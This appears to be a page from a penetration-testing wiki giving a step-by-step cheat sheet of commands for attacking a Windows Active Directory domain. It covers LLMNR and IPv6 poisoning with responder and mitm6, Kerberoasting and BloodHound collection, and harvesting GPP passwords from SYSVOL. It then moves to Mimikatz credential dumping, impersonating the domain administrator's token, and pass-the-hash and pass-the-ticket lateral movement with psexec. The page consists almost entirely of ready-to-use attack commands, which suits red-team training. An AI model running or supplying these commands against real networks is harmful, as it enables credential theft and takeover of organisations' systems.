Techniques Mind Map

Quick Commands Cheatsheet

🚀 Start Here

# Terminal 1 - LLMNR
sudo responder -I eth0 -wrf

# Terminal 2 - IPv6
sudo mitm6 -d domain.local

# Terminal 3 - Check targets
crackmapexec smb 10.0.0.0/24

🎯 Must Do After Credentials

# Kerberoasting (ALWAYS!)
GetUserSPNs.py domain/user:pass -request -dc-ip DC_IP

# BloodHound collection
bloodhound-python -d domain -u user -p pass -c all

# Check for GPP
Get-GPPPassword
findstr /S cpassword \\dc\sysvol\*.xml

💀 After Local Admin

# Mimikatz
privilege::debug
sekurlsa::logonpasswords

# Token impersonation
load incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator

🔥 Lateral Movement

# Pass-the-Hash
psexec.py -hashes :NTLM domain/administrator@target

# Pass-the-Ticket
getTGT.py domain/user:pass
export KRB5CCNAME=user.ccache
psexec.py -k -no-pass domain/administrator@target

Links to Detailed Guides

Technique

File

Description

LLMNR Poisoning

llmnr-poisoning.md

Capture NTLMv2 hashes

Kerberoasting

kerberoasting.md

Extract service account passwords

Pass Attacks

pass-attacks.md

PTH, PTT, PTC techniques

Mimikatz

mimikatz-overview.md

Credential dumping

Golden Tickets

golden-ticket-attacks.md

Ultimate persistence

💡 Pro Tip: Start with passive attacks (responder/mitm6) and ALWAYS try Kerberoasting after getting any valid credentials!

PreviousAttack Flow Diagram NextActive Directory Techniques

Last updated 8 months ago

hashtagQuick Commands Cheatsheet

hashtag🚀 Start Here

hashtag🎯 Must Do After Credentials

hashtag💀 After Local Admin

hashtag🔥 Lateral Movement

hashtagLinks to Detailed Guides